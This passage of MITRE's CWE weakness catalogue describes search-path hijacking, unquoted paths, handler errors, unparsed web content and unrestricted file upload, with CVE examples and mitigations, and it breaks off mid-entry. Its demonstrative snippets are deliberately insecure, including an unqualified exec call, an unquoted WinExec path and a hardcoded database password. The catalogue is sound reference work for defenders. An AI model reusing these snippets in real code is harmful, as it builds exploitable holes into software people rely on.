Windows are under-studied and possibly under-reported. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, Relationships, Time_of_Introduction - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-12-28 - updated References - - - CWE Content Team - MITRE - 2010-02-16 - updated References, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2010-06-21 - updated Detection_Factors, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-09-27 - updated Description, Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Demonstrative_Examples, References, Relationships, Type - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The product uses a fixed or controlled search path to find resources, but one or more locations in that path can be under the control of unintended actors. - - Although this weakness can occur with any type of resource, it is frequently introduced when a product uses a directory search path to find executables or code libraries, but the path contains a directory that can be modified by an attacker, such as "/tmp" or the current working directory. - In Windows-based systems, when the LoadLibrary or LoadLibraryEx function is called with a DLL name that does not contain a fully qualified path, the function follows a search order that includes two path elements that might be uncontrolled: - - - the directory from which the program has been loaded - the current working directory. - - - In some cases, the attack can be conducted remotely, such as when SMB or WebDAV network shares are used. - In some Unix-based systems, a PATH might be created that contains an empty element, e.g. by splicing an empty variable into the PATH. This empty element can be interpreted as equivalent to the current working directory, which might be an untrusted search element. - In software package management frameworks (e.g., npm, RubyGems, or PyPi), the framework may identify dependencies on third-party libraries or other packages, then consult a repository that contains the desired package. The framework may search a public repository before a private repository. This could be exploited by attackers by placing a malicious package in the public repository that has the same name as a package from the private repository. The search path might not be directly under control of the developer relying on the framework, but this search order effectively contains an untrusted element. - - - - - - - - - - - - DLL preloading - This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427. - - - Binary planting - This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427. - - - Insecure library loading - This term is one of several that are used to describe exploitation of untrusted search path elements in Windows systems, which received wide attention in August 2010. From a weakness perspective, the term is imprecise because it can apply to both CWE-426 and CWE-427. - - - Dependency confusion - As of February 2021, this term is used to describe CWE-427 in the context of managing installation of software package dependencies, in which attackers release packages on public sites where the names are the same as package names used by private repositories, and the search for the dependent package tries the public site first, downloading untrusted code. It may also be referred to as a "substitution attack." - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - Architecture and Design - Implementation - Attack Surface Reduction - Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428. - - - Implementation - Attack Surface Reduction - When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the full-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths. - - - Implementation - Attack Surface Reduction - Remove or restrict all environment settings before invoking other programs. This includes the PATH environment variable, LD_LIBRARY_PATH, and other settings that identify the location of code libraries, and any application-specific search paths. - - - Implementation - Check your search path before use and remove any elements that are likely to be unsafe, such as the current working directory or a temporary files directory. Since this is a denylist approach, it might not be a complete solution. - - - Implementation - Use other functions that require explicit paths. Making use of any of the other readily available functions that require explicit paths is a safe way to avoid this problem. For example, system() in C does not require a full path since the shell can take care of finding the program using the PATH environment variable, while execl() and execv() require a full path. - - - - - The following code is from a web application that allows users access to an interface through which they can update their password on the system. In this environment, user passwords can be managed using the Network Information System (NIS), which is commonly used on UNIX systems. When performing NIS updates, part of the process for updating passwords is to run a make command in the /var/yp directory. Performing NIS updates requires extra privileges. - - ...System.Runtime.getRuntime().exec("make");... - - The problem here is that the program does not specify an absolute path for make and does not clean its environment prior to executing the call to Runtime.exec(). If an attacker can modify the $PATH variable to point to a malicious binary called make and cause the program to be executed in their environment, then the malicious binary will be loaded instead of the one intended. Because of the nature of the application, it runs with the privileges necessary to perform system operations, which means the attacker's make will now be run with these privileges, possibly giving the attacker complete control of the system. - - - - - CVE-2010-3402 - "DLL hijacking" issue in document editor. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3402 - - - CVE-2010-3397 - "DLL hijacking" issue in encryption software. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3397 - - - CVE-2010-3138 - "DLL hijacking" issue in library used by multiple media players. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3138 - - - CVE-2010-3152 - "DLL hijacking" issue in illustration program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3152 - - - CVE-2010-3147 - "DLL hijacking" issue in address book. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3147 - - - CVE-2010-3135 - "DLL hijacking" issue in network monitoring software. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3135 - - - CVE-2010-3131 - "DLL hijacking" issue in web browser. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3131 - - - CVE-2010-1795 - "DLL hijacking" issue in music player/organizer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1795 - - - CVE-2002-1576 - Product uses the current working directory to find and execute a program, which allows local users to gain privileges by creating a symlink that points to a malicious version of the program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1576 - - - CVE-1999-1461 - Product trusts the PATH environmental variable to find and execute a program, which allows local users to obtain root access by modifying the PATH to point to a malicous version of that program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1461 - - - CVE-1999-1318 - Software uses a search path that includes the current working directory (.), which allows local users to gain privileges via malicious programs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1318 - - - CVE-2003-0579 - Admin software trusts the user-supplied -uv.install command line option to find and execute the uv.install program, which allows local users to gain privileges by providing a pathname that is under control of the user. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0579 - - - CVE-2000-0854 - When a document is opened, the directory of that document is first used to locate DLLs , which could allow an attacker to execute arbitrary commands by inserting malicious DLLs into the same directory as the document. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0854 - - - CVE-2001-0943 - Database trusts the PATH environment variable to find and execute programs, which allows local users to modify the PATH to point to malicious programs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0943 - - - CVE-2001-0942 - Database uses an environment variable to find and execute a program, which allows local users to execute arbitrary programs by changing the environment variable. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0942 - - - CVE-2001-0507 - Server uses relative paths to find system files that will run in-process, which allows local users to gain privileges via a malicious file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0507 - - - CVE-2002-2017 - Product allows local users to execute arbitrary code by setting an environment variable to reference a malicious program. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2017 - - - CVE-1999-0690 - Product includes the current directory in root's PATH variable. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0690 - - - CVE-2001-0912 - Error during packaging causes product to include a hard-coded, non-standard directory in search path. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0912 - - - CVE-2001-0289 - Product searches current working directory for configuration file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0289 - - - CVE-2005-1705 - Product searches current working directory for configuration file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1705 - - - CVE-2005-1307 - Product executable other program from current working directory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1307 - - - CVE-2002-2040 - Untrusted path. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2040 - - - CVE-2005-2072 - Modification of trusted environment variable leads to untrusted path vulnerability. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2072 - - - CVE-2005-1632 - Product searches /tmp for modules before other paths. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1632 - - - - - Uncontrolled Search Path Element - - - - - - - - - - - - - - - - - - - - - - Unlike untrusted search path (CWE-426), which inherently involves control over the definition of a control sphere (i.e., modification of a search path), this entry concerns a fixed control sphere in which some part of the sphere may be under attacker control (i.e., the search path cannot be modified by an attacker, but one element of the path can be under attacker control). - This weakness is not a clean fit under CWE-668 or CWE-610, which suggests that the control sphere model might need enhancement or clarification. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Maintenance_Notes, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Alternate_Terms, Applicable_Platforms, Description, Maintenance_Notes, Observed_Examples, References, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Alternate_Terms, Description, Maintenance_Notes, References, Theoretical_Notes - - - - - The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path. - If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as "C:\Program.exe" to be run by a privileged program making use of WinExec. - - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - Implementation - Properly quote the full search path before executing a program on the system. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - The following example demonstrates the weakness. - - UINT errCode = WinExec( "C:\\Program Files\\Foo\\Bar", SW_SHOW ); - - - - - - CVE-2005-1185 - Small handful of others. Program doesn't quote the "C:\Program Files\" path when calling a program to be executed - or any other path with a directory or file whose name contains a space - so attacker can put a malicious program.exe into C:. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1185 - - - CVE-2005-2938 - CreateProcess() and CreateProcessAsUser() can be misused by applications to allow "program.exe" style attacks in C: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2938 - - - CVE-2000-1128 - Applies to "Common Files" folder, with a malicious common.exe, instead of "Program Files"/program.exe. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1128 - - - - Program Invocation - - - - Unquoted Search Path or Element - - - - - - - - This weakness could apply to any OS that supports spaces in filenames, especially any OS that make it easy for a user to insert spaces into filenames or folders, such as Windows. While spaces are technically supported in Unix, the practice is generally avoided. . - - - This weakness primarily involves the lack of quoting, which is not explicitly stated as a part of CWE-116. CWE-116 also describes output in light of structured messages, but the generation of a filename or search path (as in this weakness) might not be considered a structured message. - An additional complication is the relationship to control spheres. Unlike untrusted search path (CWE-426), which inherently involves control over the definition of a control sphere, this entry concerns a fixed control sphere in which some part of the sphere may be under attacker control. This is not a clean fit under CWE-668 or CWE-610, which suggests that the control sphere model needs enhancement or clarification. - - Under-studied, probably under-reported. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Applicable_Platforms, Description, Maintenance_Notes, Other_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Applicable_Platforms, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - - - A software system that accepts path input in the form of multiple trailing dot ('filedir....') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - BUGTRAQ:20040205 - Apache + Resin Reveals JSP Source Code ... - http://marc.info/?l=bugtraq&m=107605633904122&w=2 - - - CVE-2004-0281 - Multiple trailing dot allows directory listing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0281 - - - - - Multiple Trailing Dot - 'filedir....' - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Observed_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Path Issue - Multiple Trailing Dot - 'filedir....' - - - - The wrong "handler" is assigned to process an object. - An example of deploying the wrong handler would be calling a servlet to reveal source code of a .JSP file, or automatically "determining" type of the object even if it is contradictory to an explicitly specified type. - - - - - - - - Resultant - This weakness is usually resultant from other weaknesses. - - - - - - - - Implementation - - - - - Integrity - Other - Varies by Context - Unexpected State - - - - - Architecture and Design - Perform a type check before interpreting an object. - - - Architecture and Design - Reject any inconsistent types, such as a file with a .GIF extension that appears to consist of PHP code. - - - - - CVE-2001-0004 - Source code disclosure via manipulated file extension that causes parsing by wrong DLL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0004 - - - CVE-2002-0025 - Web browser does not properly handle the Content-Type header field, causing a different application to process the document. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0025 - - - CVE-2000-1052 - Source code disclosure by directly invoking a servlet. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1052 - - - CVE-2002-1742 - Arbitrary Perl functions can be loaded by calling a non-existent function that activates a handler. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1742 - - - - - Improper Handler Deployment - - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - Improper Handler Deployment - - - - A handler is not available or implemented. - When an exception is thrown and not caught, the process has given up an opportunity to decide if a given failure or event is worth a change in execution. - - - - - - - - - - Implementation - - - - - Other - Varies by Context - - - - - Implementation - Handle all possible situations (e.g. error condition). - - - Implementation - If an operation can throw an Exception, implement a handler for that specific exception. - - - - - If a Servlet does not catch all exceptions, it may reveal debugging information that will help an adversary form a plan of attack. In the following method a DNS lookup failure will cause the Servlet to throw an exception. - - protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println("hello " + addr.getHostName());} - - When a Servlet throws an exception, the default error response the Servlet container sends back to the user typically includes debugging information. This information is of great value to an attacker. - - - - - Missing Handler - - - SFP4 - Unchecked Status Condition - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - - - The application uses a signal handler that shares state with other signal handlers, but it does not properly mask or prevent those signal handlers from being invoked while the original signal handler is still running. - During the execution of a signal handler, it can be interrupted by another handler when a different signal is sent. If the two handlers share state - such as global variables - then an attacker can corrupt the state by sending another signal before the first handler has completed execution. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Modify Application Data - - - - - Implementation - Turn off dangerous handlers when performing sensitive operations. - - - - - SIG00-C - Mask signals handled by noninterruptible signal handlers - - - Dangerous handler not cleared/disabled during sensitive operations - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2010-12-13 - updated Applicable_Platforms, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Dangerous Handler not Cleared/Disabled During Sensitive Operations - Dangerous Handler not Disabled During Sensitive Operations - - - - The software stores raw content or supporting code under the web document root with an extension that is not specifically handled by the server. - If code is stored in a file with an extension such as ".inc" or ".pl", and the web server does not have a handler for that extension, then the server will likely send the contents of the file directly to the requester without the pre-processing that was expected. When that file contains sensitive information such as database credentials, this may allow the attacker to compromise the application or associated components. - - - - - - - - - Implementation - - - Operation - - - - - Confidentiality - Read Application Data - - - - - Architecture and Design - Perform a type check before interpreting files. - - - Architecture and Design - Do not store sensitive information in files which may be misinterpreted. - - - - - The following code uses an include file to store database credentials: - database.inc - - <?php$dbName = 'usersDB';$dbPassword = 'skjdh#67nkjd3$3$';?> - - login.php - - <?phpinclude('database.inc');$db = connectToDB($dbName, $dbPassword);$db.authenticateUser($username, $password);?> - - If the server does not have an explicit handler set for .inc files it may send the contents of database.inc to an attacker without pre-processing, if the attacker requests the file directly. This will expose the database name and password. - - - - - CVE-2002-1886 - ".inc" file stored under web document root and returned unparsed by the server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1886 - - - CVE-2002-2065 - ".inc" file stored under web document root and returned unparsed by the server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2065 - - - CVE-2005-2029 - ".inc" file stored under web document root and returned unparsed by the server - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2029 - - - CVE-2001-0330 - direct request to .pl file leaves it unparsed - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0330 - - - CVE-2002-0614 - .inc file - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0614 - - - CVE-2004-2353 - unparsed config.conf file - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2353 - - - CVE-2007-3365 - Chain: uppercase file extensions causes web server to return script source code instead of executing the script. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3365 - - - - - Unparsed Raw Web Content Delivery - - - - - - - This overlaps direct requests (CWE-425), alternate path (CWE-424), permissions (CWE-275), and sensitive file under web root (CWE-219). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2010-09-27 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Observed_Examples - - - - - The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. - - - - - - - - - - Primary - This can be primary when there is no check at all. - - - Resultant - This is frequently resultant when use of double extensions (e.g. ".php.gif") bypasses a sanity check. - - - Resultant - This can be resultant from client-side enforcement (CWE-602); some products will include web script in web clients to check the filename, without verifying on the server side. - - - - - - - - - - - Unrestricted File Upload - The "unrestricted file upload" term is used in vulnerability databases and elsewhere, but it is insufficiently precise. The phrase could be interpreted as the lack of restrictions on the size or number of uploaded files, which is a resource consumption issue. - - - - - Implementation - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Medium - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - Arbitrary code execution is possible if an uploaded file is interpreted and executed as code by the recipient. This is especially true for .asp and .php extensions uploaded to web servers because these file types are often treated as automatically executable, even when file system permissions do not specify execution. For example, in Unix environments, programs typically cannot run unless the execute bit is set, but PHP programs may be executed by the web server without directly invoking them on the operating system. - - - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - Generate a new, unique filename for an uploaded file instead of using the user-supplied filename, so that no external input is used at all.[REF-422] [REF-423] - - - Architecture and Design - Enforcement by Conversion - When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. - - - Architecture and Design - Consider storing the uploaded files outside of the web document root entirely. Then, use other mechanisms to deliver the files dynamically. [REF-423] - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - For example, limiting filenames to alphanumeric characters can help to restrict the introduction of unintended file extensions. - - - - Architecture and Design - Define a very limited set of allowable extensions and only generate filenames that end in these extensions. Consider the possibility of XSS (CWE-79) before allowing .html or .htm file types. - - - Implementation - Input Validation - Ensure that only one extension is used in the filename. Some web servers, including some versions of Apache, may process files based on inner extensions so that "filename.php.gif" is fed to the PHP interpreter.[REF-422] [REF-423] - - - Implementation - When running on a web server that supports case-insensitive filenames, perform case-insensitive evaluations of the extensions that are provided. - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Implementation - Do not rely exclusively on sanity checks of file contents to ensure that the file is of the expected type and size. It may be possible for an attacker to hide code in some file segments that will still be executed by the server. For example, GIF images may contain a free-form comments field. - - - Implementation - Do not rely exclusively on the MIME content type or filename attribute when determining how to render a file. Validating the MIME content type and ensuring that it matches the extension is only a partial solution. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - Architecture and Design - Operation - Sandbox or Jail - - Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. - OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - Limited - The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. - - - - - The following code intends to allow a user to upload a picture to the web server. The HTML code that drives the form on the user end has an input field of type "file". - - <form action="upload_picture.php" method="post" enctype="multipart/form-data"> - Choose a file to upload:<input type="file" name="filename"/><br/><input type="submit" name="submit" value="Submit"/> - </form> - - Once submitted, the form above sends the file to upload_picture.php on the web server. PHP stores the file in a temporary location until it 